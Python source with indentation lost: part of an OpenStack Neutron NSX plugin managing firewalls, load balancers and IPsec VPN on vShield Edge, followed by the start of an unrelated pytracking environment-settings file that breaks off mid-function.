# The firewall rule is not associated with firewall policy yet
return None
return self._get_firewall_list_from_firewall_policy(
context, rule.firewall_policy_id)
def _vcns_update_firewall(self, context, fw, router_id=None, **kwargs):
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, router_id)
firewall_rule_list = kwargs.get('firewall_rule_list')
if not firewall_rule_list:
firewall_rule_list = self._make_firewall_rule_list_by_policy_id(
context, fw['firewall_policy_id'])
fw_with_rules = fw
fw_with_rules['firewall_rule_list'] = firewall_rule_list
try:
self.vcns_driver.update_firewall(context, edge_id, fw_with_rules)
except exceptions.VcnsApiException as e:
self._firewall_set_status(
context, fw['id'], service_constants.ERROR)
msg = (_("Failed to create firewall on vShield Edge "
"bound on router %s") % router_id)
LOG.exception(msg)
raise e
except exceptions.VcnsBadRequest as e:
self._firewall_set_status(
context, fw['id'], service_constants.ERROR)
LOG.exception(_("Bad Firewall request Input"))
raise e
def _vcns_delete_firewall(self, context, router_id=None, **kwargs):
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, router_id)
#TODO(linb):do rollback on error
self.vcns_driver.delete_firewall(context, edge_id)
def create_firewall(self, context, firewall):
LOG.debug(_("create_firewall() called"))
router_id = firewall['firewall'].get(vcns_const.ROUTER_ID)
self.check_router(context, router_id)
if self._get_resource_router_id_binding(
context, firewall_db.Firewall, router_id=router_id):
msg = _("A firewall is already associated with the router")
LOG.error(msg)
raise nsx_exc.ServiceOverQuota(
overs='firewall', err_msg=msg)
fw = super(NsxAdvancedPlugin, self).create_firewall(context, firewall)
#Add router service insertion binding with firewall object
res = {
'id': fw['id'],
'router_id': router_id
}
self._process_create_resource_router_id(
context, res, firewall_db.Firewall)
# Since there is only one firewall per edge,
# here would be bulk configuration operation on firewall
self._vcns_update_firewall(context, fw, router_id)
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
fw[rsi.ROUTER_ID] = router_id
return fw
def update_firewall(self, context, id, firewall):
LOG.debug(_("update_firewall() called"))
self._ensure_firewall_update_allowed(context, id)
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=id)
rule_list_pre = self._make_firewall_rule_list_by_policy_id(
context,
self.get_firewall(context, id)['firewall_policy_id'])
firewall['firewall']['status'] = service_constants.PENDING_UPDATE
fw = super(NsxAdvancedPlugin, self).update_firewall(
context, id, firewall)
fw[rsi.ROUTER_ID] = service_router_binding['router_id']
rule_list_new = self._make_firewall_rule_list_by_policy_id(
context, fw['firewall_policy_id'])
if rule_list_pre == rule_list_new:
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
return fw
else:
self._vcns_update_firewall(
context, fw, service_router_binding.router_id,
firewall_rule_list=rule_list_new)
self._firewall_set_status(
context, fw['id'], service_constants.ACTIVE, fw)
return fw
def delete_firewall(self, context, id):
LOG.debug(_("delete_firewall() called"))
self._firewall_set_status(
context, id, service_constants.PENDING_DELETE)
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=id)
self._vcns_delete_firewall(context, service_router_binding.router_id)
super(NsxAdvancedPlugin, self).delete_firewall(context, id)
self._delete_resource_router_id_binding(
context, id, firewall_db.Firewall)
def get_firewall(self, context, id, fields=None):
fw = super(NsxAdvancedPlugin, self).get_firewall(
context, id, fields)
if fields and rsi.ROUTER_ID not in fields:
return fw
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
fw[rsi.ROUTER_ID] = service_router_binding['router_id']
return fw
def get_firewalls(self, context, filters=None, fields=None):
fws = super(NsxAdvancedPlugin, self).get_firewalls(
context, filters, fields)
if fields and rsi.ROUTER_ID not in fields:
return fws
service_router_bindings = self._get_resource_router_id_bindings(
context, firewall_db.Firewall,
resource_ids=[fw['id'] for fw in fws])
mapping = dict([(binding['resource_id'], binding['router_id'])
for binding in service_router_bindings])
for fw in fws:
fw[rsi.ROUTER_ID] = mapping[fw['id']]
return fws
def update_firewall_rule(self, context, id, firewall_rule):
LOG.debug(_("update_firewall_rule() called"))
self._ensure_update_or_delete_firewall_rule(context, id)
fwr_pre = self.get_firewall_rule(context, id)
fwr = super(NsxAdvancedPlugin, self).update_firewall_rule(
context, id, firewall_rule)
if fwr_pre == fwr:
return fwr
# check if this rule is associated with firewall
fw_list = self._get_firewall_list_from_firewall_rule(context, id)
if not fw_list:
return fwr
for fw in fw_list:
# get router service insertion binding with firewall id
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
#TODO(linb): do rollback on error
self.vcns_driver.update_firewall_rule(context, id, edge_id, fwr)
return fwr
def update_firewall_policy(self, context, id, firewall_policy):
LOG.debug(_("update_firewall_policy() called"))
self._ensure_firewall_policy_update_allowed(context, id)
firewall_rules_pre = self._make_firewall_rule_list_by_policy_id(
context, id)
fwp = super(NsxAdvancedPlugin, self).update_firewall_policy(
context, id, firewall_policy)
firewall_rules = self._make_firewall_rule_list_by_policy_id(
context, id)
if firewall_rules_pre == firewall_rules:
return fwp
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# Get the router_service insertion binding with firewall id
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
self._vcns_update_firewall(
context, fw, service_router_binding.router_id,
firewall_rule_list=firewall_rules)
return fwp
def insert_rule(self, context, id, rule_info):
LOG.debug(_("insert_rule() called"))
self._ensure_firewall_policy_update_allowed(context, id)
fwp = super(NsxAdvancedPlugin, self).insert_rule(
context, id, rule_info)
fwr = super(NsxAdvancedPlugin, self).get_firewall_rule(
context, rule_info['firewall_rule_id'])
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
if rule_info.get('insert_before') or rule_info.get('insert_after'):
#if insert_before or insert_after is set, we would call
#VCNS insert_rule API
#TODO(linb): do rollback on error
self.vcns_driver.insert_rule(context, rule_info, edge_id, fwr)
else:
#Else we would call bulk configuration on the firewall
self._vcns_update_firewall(context, fw, edge_id=edge_id)
return fwp
def remove_rule(self, context, id, rule_info):
LOG.debug(_("remove_rule() called"))
self._ensure_firewall_policy_update_allowed(context, id)
fwp = super(NsxAdvancedPlugin, self).remove_rule(
context, id, rule_info)
fwr = super(NsxAdvancedPlugin, self).get_firewall_rule(
context, rule_info['firewall_rule_id'])
# check if this policy is associated with firewall
fw_list = self._get_firewall_list_from_firewall_policy(context, id)
if not fw_list:
return fwp
for fw in fw_list:
# TODO(fank): optimized by using _get_resource_router_id_bindings
service_router_binding = self._get_resource_router_id_binding(
context, firewall_db.Firewall, resource_id=fw['id'])
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
#TODO(linb): do rollback on error
self.vcns_driver.delete_firewall_rule(
context, fwr['id'], edge_id)
return fwp
#
# LBAAS service plugin implementation
#
def _get_edge_id_by_vip_id(self, context, vip_id):
try:
service_router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=vip_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to find the edge with "
"vip_id: %s"), vip_id)
return self._get_edge_id_by_vcns_edge_binding(
context, service_router_binding.router_id)
def _get_all_vip_addrs_by_router_id(
self, context, router_id):
vip_bindings = self._get_resource_router_id_bindings(
context, loadbalancer_db.Vip, router_ids=[router_id])
vip_addrs = []
for vip_binding in vip_bindings:
vip = self.get_vip(context, vip_binding.resource_id)
vip_addrs.append(vip.get('address'))
return vip_addrs
def _add_router_service_insertion_binding(self, context, resource_id,
router_id,
model):
res = {
'id': resource_id,
'router_id': router_id
}
self._process_create_resource_router_id(context, res,
model)
def _resource_set_status(self, context, model, id, status, obj=None,
pool_id=None):
with context.session.begin(subtransactions=True):
try:
qry = context.session.query(model)
if issubclass(model, loadbalancer_db.PoolMonitorAssociation):
res = qry.filter_by(monitor_id=id,
pool_id=pool_id).one()
else:
res = qry.filter_by(id=id).one()
if status == service_constants.PENDING_UPDATE and (
res.get('status') == service_constants.PENDING_DELETE):
msg = (_("Operation can't be performed, Since resource "
"%(model)s : %(id)s is in DELETEing status!") %
{'model': model,
'id': id})
LOG.error(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
else:
res.status = status
except sa_exc.NoResultFound:
msg = (_("Resource %(model)s : %(id)s not found!") %
{'model': model,
'id': id})
LOG.exception(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
if obj:
obj['status'] = status
def _vcns_create_pool_and_monitors(self, context, pool_id, **kwargs):
pool = self.get_pool(context, pool_id)
edge_id = kwargs.get('edge_id')
if not edge_id:
edge_id = self._get_edge_id_by_vip_id(
context, pool['vip_id'])
#Check wheter the pool is already created on the router
#in case of future's M:N relation between Pool and Vip
#Check associated HealthMonitors and then create them
for monitor_id in pool.get('health_monitors'):
hm = self.get_health_monitor(context, monitor_id)
try:
self.vcns_driver.create_health_monitor(
context, edge_id, hm)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create healthmonitor "
"associated with pool id: %s!") % pool_id)
for monitor_ide in pool.get('health_monitors'):
if monitor_ide == monitor_id:
break
self.vcns_driver.delete_health_monitor(
context, monitor_ide, edge_id)
#Create the pool on the edge
members = [
super(NsxAdvancedPlugin, self).get_member(
context, member_id)
for member_id in pool.get('members')
]
try:
self.vcns_driver.create_pool(context, edge_id, pool, members)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create pool on vshield edge"))
self.vcns_driver.delete_pool(
context, pool_id, edge_id)
for monitor_id in pool.get('health_monitors'):
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
def _vcns_update_pool(self, context, pool, **kwargs):
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
members = kwargs.get('members')
if not members:
members = [
super(NsxAdvancedPlugin, self).get_member(
context, member_id)
for member_id in pool.get('members')
]
self.vcns_driver.update_pool(context, edge_id, pool, members)
def create_vip(self, context, vip):
LOG.debug(_("create_vip() called"))
router_id = vip['vip'].get(vcns_const.ROUTER_ID)
self.check_router(context, router_id)
#Check whether the vip port is an external port
subnet_id = vip['vip']['subnet_id']
network_id = self.get_subnet(context, subnet_id)['network_id']
ext_net = self._get_network(context, network_id)
if not ext_net.external:
msg = (_("Network '%s' is not a valid external "
"network") % network_id)
raise nsx_exc.NsxPluginException(err_msg=msg)
v = super(NsxAdvancedPlugin, self).create_vip(context, vip)
#Get edge_id for the resource
router_binding = vcns_db.get_vcns_router_binding(
context.session,
router_id)
edge_id = router_binding.edge_id
#Add vip_router binding
self._add_router_service_insertion_binding(context, v['id'],
router_id,
loadbalancer_db.Vip)
#Create the vip port on vShield Edge
router = self._get_router(context, router_id)
self._update_interface(context, router, sync=True)
#Create the vip and associated pool/monitor on the corresponding edge
try:
self._vcns_create_pool_and_monitors(
context, v['pool_id'], edge_id=edge_id)
self.vcns_driver.create_vip(context, edge_id, v)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to create vip!"))
self._delete_resource_router_id_binding(
context, v['id'], loadbalancer_db.Vip)
super(NsxAdvancedPlugin, self).delete_vip(context, v['id'])
self._resource_set_status(context, loadbalancer_db.Vip,
v['id'], service_constants.ACTIVE, v)
v[rsi.ROUTER_ID] = router_id
return v
def update_vip(self, context, id, vip):
edge_id = self._get_edge_id_by_vip_id(context, id)
old_vip = self.get_vip(context, id)
session_persistence_update = bool(
vip['vip'].get('session_persistence'))
vip['vip']['status'] = service_constants.PENDING_UPDATE
v = super(NsxAdvancedPlugin, self).update_vip(context, id, vip)
v[rsi.ROUTER_ID] = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=id)['router_id']
if old_vip['pool_id'] != v['pool_id']:
self.vcns_driver.delete_vip(context, id)
#Delete old pool/monitor on the edge
#TODO(linb): Factor out procedure for removing pool and health
#separate method
old_pool = self.get_pool(context, old_vip['pool_id'])
self.vcns_driver.delete_pool(
context, old_vip['pool_id'], edge_id)
for monitor_id in old_pool.get('health_monitors'):
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
#Create new pool/monitor object on the edge
#TODO(linb): add exception handle if error
self._vcns_create_pool_and_monitors(
context, v['pool_id'], edge_id=edge_id)
self.vcns_driver.create_vip(context, edge_id, v)
return v
try:
self.vcns_driver.update_vip(context, v, session_persistence_update)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update vip with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Vip,
id, service_constants.ERROR, v)
self._resource_set_status(context, loadbalancer_db.Vip,
v['id'], service_constants.ACTIVE, v)
return v
def delete_vip(self, context, id):
v = self.get_vip(context, id)
self._resource_set_status(
context, loadbalancer_db.Vip,
id, service_constants.PENDING_DELETE)
try:
self.vcns_driver.delete_vip(context, id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to delete vip with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Vip,
id, service_constants.ERROR)
edge_id = self._get_edge_id_by_vip_id(context, id)
#Check associated HealthMonitors and then delete them
pool = self.get_pool(context, v['pool_id'])
self.vcns_driver.delete_pool(context, v['pool_id'], edge_id)
for monitor_id in pool.get('health_monitors'):
#TODO(linb): do exception handle if error
self.vcns_driver.delete_health_monitor(
context, monitor_id, edge_id)
router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=id)
router = self._get_router(context, router_binding.router_id)
self._delete_resource_router_id_binding(
context, id, loadbalancer_db.Vip)
super(NsxAdvancedPlugin, self).delete_vip(context, id)
self._update_interface(context, router, sync=True)
def get_vip(self, context, id, fields=None):
vip = super(NsxAdvancedPlugin, self).get_vip(context, id, fields)
if fields and rsi.ROUTER_ID not in fields:
return vip
service_router_binding = self._get_resource_router_id_binding(
context, loadbalancer_db.Vip, resource_id=vip['id'])
vip[rsi.ROUTER_ID] = service_router_binding['router_id']
return vip
def get_vips(self, context, filters=None, fields=None):
vips = super(NsxAdvancedPlugin, self).get_vips(
context, filters, fields)
if fields and rsi.ROUTER_ID not in fields:
return vips
service_router_bindings = self._get_resource_router_id_bindings(
context, loadbalancer_db.Vip,
resource_ids=[vip['id'] for vip in vips])
mapping = dict([(binding['resource_id'], binding['router_id'])
for binding in service_router_bindings])
for vip in vips:
vip[rsi.ROUTER_ID] = mapping[vip['id']]
return vips
def update_pool(self, context, id, pool):
pool['pool']['status'] = service_constants.PENDING_UPDATE
p = super(NsxAdvancedPlugin, self).update_pool(context, id, pool)
#Check whether the pool is already associated with the vip
if not p.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ACTIVE, p)
return p
try:
self._vcns_update_pool(context, p)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with id: %s!"), id)
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ERROR, p)
self._resource_set_status(context, loadbalancer_db.Pool,
p['id'], service_constants.ACTIVE, p)
return p
def create_member(self, context, member):
m = super(NsxAdvancedPlugin, self).create_member(context, member)
pool_id = m.get('pool_id')
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id,
service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
super(NsxAdvancedPlugin, self).delete_member(context, m['id'])
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
def update_member(self, context, id, member):
member['member']['status'] = service_constants.PENDING_UPDATE
old_member = self.get_member(context, id)
m = super(NsxAdvancedPlugin, self).update_member(
context, id, member)
if m['pool_id'] != old_member['pool_id']:
old_pool_id = old_member['pool_id']
old_pool = self.get_pool(context, old_pool_id)
if old_pool.get('vip_id'):
self._resource_set_status(
context, loadbalancer_db.Pool,
old_pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, old_pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update old pool "
"with the member"))
super(NsxAdvancedPlugin, self).delete_member(
context, m['id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
old_pool_id, service_constants.ACTIVE)
pool_id = m['pool_id']
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id,
service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
super(NsxAdvancedPlugin, self).delete_member(
context, m['id'])
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(context, loadbalancer_db.Member,
m['id'], service_constants.ACTIVE, m)
return m
def delete_member(self, context, id):
m = self.get_member(context, id)
super(NsxAdvancedPlugin, self).delete_member(context, id)
pool_id = m['pool_id']
pool = self.get_pool(context, pool_id)
if not pool.get('vip_id'):
return
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update pool with the member"))
self._resource_set_status(context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
def update_health_monitor(self, context, id, health_monitor):
old_hm = super(NsxAdvancedPlugin, self).get_health_monitor(
context, id)
hm = super(NsxAdvancedPlugin, self).update_health_monitor(
context, id, health_monitor)
for hm_pool in hm.get('pools'):
pool_id = hm_pool['pool_id']
pool = self.get_pool(context, pool_id)
if pool.get('vip_id'):
edge_id = self._get_edge_id_by_vip_id(
context, pool['vip_id'])
try:
self.vcns_driver.update_health_monitor(
context, edge_id, old_hm, hm)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update monitor "
"with id: %s!"), id)
return hm
def create_pool_health_monitor(self, context,
health_monitor, pool_id):
monitor_id = health_monitor['health_monitor']['id']
pool = self.get_pool(context, pool_id)
monitors = pool.get('health_monitors')
if len(monitors) > 0:
msg = _("Vcns right now can only support "
"one monitor per pool")
LOG.error(msg)
raise nsx_exc.NsxPluginException(err_msg=msg)
#Check whether the pool is already associated with the vip
if not pool.get('vip_id'):
res = super(NsxAdvancedPlugin,
self).create_pool_health_monitor(context,
health_monitor,
pool_id)
return res
#Get the edge_id
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
res = super(NsxAdvancedPlugin,
self).create_pool_health_monitor(context,
health_monitor,
pool_id)
monitor = self.get_health_monitor(context, monitor_id)
#TODO(linb)Add Exception handle if error
self.vcns_driver.create_health_monitor(context, edge_id, monitor)
#Get updated pool
pool['health_monitors'].append(monitor['id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to associate monitor with pool!"))
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ERROR)
super(NsxAdvancedPlugin, self).delete_pool_health_monitor(
context, monitor_id, pool_id)
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
self._resource_set_status(
context, loadbalancer_db.PoolMonitorAssociation,
monitor_id, service_constants.ACTIVE, res,
pool_id=pool_id)
return res
def delete_pool_health_monitor(self, context, id, pool_id):
super(NsxAdvancedPlugin, self).delete_pool_health_monitor(
context, id, pool_id)
pool = self.get_pool(context, pool_id)
#Check whether the pool is already associated with the vip
if pool.get('vip_id'):
#Delete the monitor on vshield edge
edge_id = self._get_edge_id_by_vip_id(context, pool['vip_id'])
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.PENDING_UPDATE)
try:
self._vcns_update_pool(context, pool)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(
_("Failed to update pool with pool_monitor!"))
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ERROR)
#TODO(linb): Add exception handle if error
self.vcns_driver.delete_health_monitor(context, id, edge_id)
self._resource_set_status(
context, loadbalancer_db.Pool,
pool_id, service_constants.ACTIVE)
def _vcns_update_ipsec_config(
self, context, vpnservice_id, removed_ipsec_conn_id=None):
sites = []
vpn_service = self._get_vpnservice(context, vpnservice_id)
edge_id = self._get_edge_id_by_vcns_edge_binding(
context, vpn_service.router_id)
if not vpn_service.router.gw_port:
msg = _("Failed to update ipsec vpn configuration on edge, since "
"the router: %s does not have a gateway yet!"
) % vpn_service.router_id
LOG.error(msg)
raise exceptions.VcnsBadRequest(resource='router', msg=msg)
external_ip = vpn_service.router.gw_port['fixed_ips'][0]['ip_address']
subnet = self._make_subnet_dict(vpn_service.subnet)
for ipsec_site_conn in vpn_service.ipsec_site_connections:
if ipsec_site_conn.id != removed_ipsec_conn_id:
site = self._make_ipsec_site_connection_dict(ipsec_site_conn)
ikepolicy = self._make_ikepolicy_dict(
ipsec_site_conn.ikepolicy)
ipsecpolicy = self._make_ipsecpolicy_dict(
ipsec_site_conn.ipsecpolicy)
sites.append({'site': site,
'ikepolicy': ikepolicy,
'ipsecpolicy': ipsecpolicy,
'subnet': subnet,
'external_ip': external_ip})
try:
self.vcns_driver.update_ipsec_config(
edge_id, sites, enabled=vpn_service.admin_state_up)
except exceptions.VcnsBadRequest:
with excutils.save_and_reraise_exception():
LOG.exception(_("Bad or unsupported Input request!"))
except exceptions.VcnsApiException:
with excutils.save_and_reraise_exception():
msg = (_("Failed to update ipsec VPN configuration "
"with vpnservice: %(vpnservice_id)s on vShield Edge: "
"%(edge_id)s") % {'vpnservice_id': vpnservice_id,
'edge_id': edge_id})
LOG.exception(msg)
def create_vpnservice(self, context, vpnservice):
LOG.debug(_("create_vpnservice() called"))
router_id = vpnservice['vpnservice'].get('router_id')
self.check_router(context, router_id)
if self.get_vpnservices(context, filters={'router_id': [router_id]}):
msg = _("a vpnservice is already associated with the router: %s"
) % router_id
LOG.warning(msg)
raise nsx_exc.ServiceOverQuota(
overs='vpnservice', err_msg=msg)
service = super(NsxAdvancedPlugin, self).create_vpnservice(
context, vpnservice)
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
def update_vpnservice(self, context, vpnservice_id, vpnservice):
vpnservice['vpnservice']['status'] = service_constants.PENDING_UPDATE
service = super(NsxAdvancedPlugin, self).update_vpnservice(
context, vpnservice_id, vpnservice)
# Only admin_state_up attribute is configurable on Edge.
if vpnservice['vpnservice'].get('admin_state_up') is None:
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
# Test whether there is one ipsec site connection attached to
# the vpnservice. If not, just return without updating ipsec
# config on edge side.
vpn_service_db = self._get_vpnservice(context, vpnservice_id)
if not vpn_service_db.ipsec_site_connections:
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
try:
self._vcns_update_ipsec_config(context, service['id'])
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ERROR, service)
self._resource_set_status(
context, vpn_db.VPNService,
service['id'], service_constants.ACTIVE, service)
return service
def create_ipsec_site_connection(self, context, ipsec_site_connection):
ipsec_site_conn = super(
NsxAdvancedPlugin, self).create_ipsec_site_connection(
context, ipsec_site_connection)
try:
self._vcns_update_ipsec_config(
context, ipsec_site_conn['vpnservice_id'])
except Exception:
with excutils.save_and_reraise_exception():
super(NsxAdvancedPlugin, self).delete_ipsec_site_connection(
context, ipsec_site_conn['id'])
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn['id'], service_constants.ACTIVE, ipsec_site_conn)
return ipsec_site_conn
def update_ipsec_site_connection(self, context, ipsec_site_connection_id,
ipsec_site_connection):
ipsec_site_connection['ipsec_site_connection']['status'] = (
service_constants.PENDING_UPDATE)
ipsec_site_conn = super(
NsxAdvancedPlugin, self).update_ipsec_site_connection(
context, ipsec_site_connection_id, ipsec_site_connection)
try:
self._vcns_update_ipsec_config(
context, ipsec_site_conn['vpnservice_id'])
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.IPsecSiteConnection, ipsec_site_conn['id'],
service_constants.ERROR, ipsec_site_conn)
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn['id'], service_constants.ACTIVE, ipsec_site_conn)
return ipsec_site_conn
def delete_ipsec_site_connection(self, context, ipsec_site_conn_id):
self._resource_set_status(
context, vpn_db.IPsecSiteConnection,
ipsec_site_conn_id, service_constants.PENDING_DELETE)
vpnservice_id = self.get_ipsec_site_connection(
context, ipsec_site_conn_id)['vpnservice_id']
try:
self._vcns_update_ipsec_config(
context, vpnservice_id, ipsec_site_conn_id)
except Exception:
with excutils.save_and_reraise_exception():
self._resource_set_status(
context, vpn_db.IPsecSiteConnection, ipsec_site_conn_id,
service_constants.ERROR)
super(NsxAdvancedPlugin, self).delete_ipsec_site_connection(
context, ipsec_site_conn_id)
class VcnsCallbacks(object):
"""Edge callback implementation Callback functions for
asynchronous tasks.
"""
def __init__(self, plugin):
self.plugin = plugin
def edge_deploy_started(self, task):
"""callback when deployment task started."""
jobdata = task.userdata['jobdata']
context = jobdata['context']
edge_id = task.userdata.get('edge_id')
neutron_router_id = jobdata['neutron_router_id']
name = task.userdata['router_name']
if edge_id:
LOG.debug(_("Start deploying %(edge_id)s for router %(name)s"), {
'edge_id': edge_id,
'name': name})
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id, edge_id=edge_id)
else:
LOG.debug(_("Failed to deploy Edge for router %s"), name)
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ERROR)
def edge_deploy_result(self, task):
"""callback when deployment task finished."""
jobdata = task.userdata['jobdata']
lrouter = jobdata['lrouter']
context = jobdata['context']
name = task.userdata['router_name']
neutron_router_id = jobdata['neutron_router_id']
router_db = None
try:
router_db = self.plugin._get_router(
context, neutron_router_id)
except l3.RouterNotFound:
# Router might have been deleted before deploy finished
LOG.exception(_("Router %s not found"), lrouter['uuid'])
if task.status == tasks_const.TaskStatus.COMPLETED:
LOG.debug(_("Successfully deployed %(edge_id)s for "
"router %(name)s"), {
'edge_id': task.userdata['edge_id'],
'name': name})
if (router_db and
router_db['status'] == service_constants.PENDING_CREATE):
router_db['status'] = service_constants.ACTIVE
binding = vcns_db.get_vcns_router_binding(
context.session, neutron_router_id)
# only update status to active if its status is pending create
if binding['status'] == service_constants.PENDING_CREATE:
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ACTIVE)
else:
LOG.debug(_("Failed to deploy Edge for router %s"), name)
if router_db:
router_db['status'] = service_constants.ERROR
vcns_db.update_vcns_router_binding(
context.session, neutron_router_id,
status=service_constants.ERROR)
def edge_delete_result(self, task):
jobdata = task.userdata['jobdata']
router_id = task.userdata['router_id']
context = jobdata['context']
if task.status == tasks_const.TaskStatus.COMPLETED:
vcns_db.delete_vcns_router_binding(context.session,
router_id)
def interface_update_result(self, task):
LOG.debug(_("interface_update_result %d"), task.status)
def snat_create_result(self, task):
LOG.debug(_("snat_create_result %d"), task.status)
def snat_delete_result(self, task):
LOG.debug(_("snat_delete_result %d"), task.status)
def dnat_create_result(self, task):
LOG.debug(_("dnat_create_result %d"), task.status)
def dnat_delete_result(self, task):
LOG.debug(_("dnat_delete_result %d"), task.status)
def routes_update_result(self, task):
LOG.debug(_("routes_update_result %d"), task.status)
def nat_update_result(self, task):
LOG.debug(_("nat_update_result %d"), task.status)
def _process_base_create_lswitch_args(*args, **kwargs):
tags = utils.get_tags()
tags.append({"tag": args[1],
"scope": "quantum_net_id"})
if args[2]:
tags.append({"tag": args[2], "scope": "os_tid"})
switch_name = args[3]
tz_config = args[4]
if kwargs.get("shared", False) or len(args) >= 6:
tags.append({"tag": "true", "scope": "shared"})
if kwargs.get("tags"):
tags.extend(kwargs["tags"])
return switch_name, tz_config, tags
|
import importlib
import os
class EnvSettings:
def __init__(self):
pytracking_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
self.results_path = '{}/tracking_results/'.format(pytracking_path)
self.segmentation_path = '{}/segmentation_results/'.format(pytracking_path)
self.network_path = '{}/networks/'.format(pytracking_path)
self.result_plot_path = '{}/result_plots/'.format(pytracking_path)
self.otb_path = ''
self.nfs_path = ''
self.lsotb_path = ''
self.ptbtir_path = ''
self._path = ''
self.tpl_path = ''
self.vot_path = ''
self.got10k_path = ''
self.lasot_path = ''
self.trackingnet_path = ''
self.davis_dir = ''
self.youtubevos_dir = ''
self.got_packed_results_path = ''
self.got_reports_path = ''
self.tn_packed_results_path = ''
def create_default_local_file():
comment = {'results_path': 'Where to store tracking results',
'network_path': 'Where tracking networks are stored.'}
path = os.path.join(os.path.dirname(__file__), 'local.py')
with open(path, 'w') as f:
settings = EnvSettings()
f.write('from pytracking.evaluation.environment import EnvSettings\n\n')
f.write('def local_env_settings():\n')
